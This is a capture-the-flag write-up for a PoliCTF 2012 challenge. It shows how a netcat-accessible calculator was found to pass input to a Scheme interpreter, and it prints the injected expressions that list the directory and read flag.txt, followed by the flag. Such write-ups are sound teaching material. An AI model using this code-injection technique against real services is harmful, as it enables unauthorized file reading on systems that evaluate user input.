PoliCTF 2012 - Bin-Pwn 200

1 minute read

Play with this amazing calculator: calc.challenges.polictf.it:4000

In this challenge, we had to blindly exploit a networked binary in a black box setting. The binary is a calculator that prompts the user for the first number, an operator, and the second number. If the operation was valid it will return the answer else it would hang there.

[email protected]:~$ nc calc.challenges.polictf.it 4000
Write the first number:1337
Write the operator:+
Write the second number:1337
[email protected]:~$

1337 + 1337 = 2674, sure no problem there. However, some odd calculations we tried tipped us off to the true nature of the calculator.

[email protected]:~$ nc calc.challenges.polictf.it 4000
Write the first number:1 1 1 1 1 1
Write the operator:+
Write the second number:1
7

[email protected]:~$ nc calc.challenges.polictf.it 4000
Write the first number:1 1 1 1 1 1
Write the operator:-
Write the second number:1
-5

1 1 1 1 1 1 + 1 looks weird and should fail but it doesnt. It even yields 7 which is 1 + 1 + 1 + 1 + 1 + 1 + 1. The subtraction operation yields an even weirder answer.

However, it was this operation that really revealed that the interpreter was Scheme.

[email protected]:~$ nc calc.challenges.polictf.it 4000
Write the first number:1
Write the operator:<
Write the second number:2
#t

[email protected]:~$ nc calc.challenges.polictf.it 4000
Write the first number:2
Write the operator:<
Write the second number:1
#f

Sweet, #t and #f are values in Scheme representing True and False respectively. Now we can expect that the layout of user supplied values would be (operator first_number second_number) e.g. (+ 1 1). Now we understand how the input is passed to an interpreter, a Scheme interpreter, so let’s craft our attack payload.

Objectives for our attack payload:

  1. List files on the disk
    1. Read from file

Listing files may be achieved by the (directory-list) function. Reading from a file may be done by (read (open-input-file “filename”).

Let’s list the files in the current directory:

[email protected]:~$ nc calc.challenges.polictf.it 4000
Write the first number:directory-list
Write the operator:
Write the second number:
(flag.txt challenge)

Great, let’s read flag.txt.

[email protected]:~$ nc calc.challenges.polictf.it 4000
Write the first number:read (open-input-file "flag.txt")
Write the operator:
Write the second number:
cb1228e2387cc12ad30fd4243fc23a0

Easy.

Flag: cb1228e2387cc12ad30fd4243fc23a0

Leave a Comment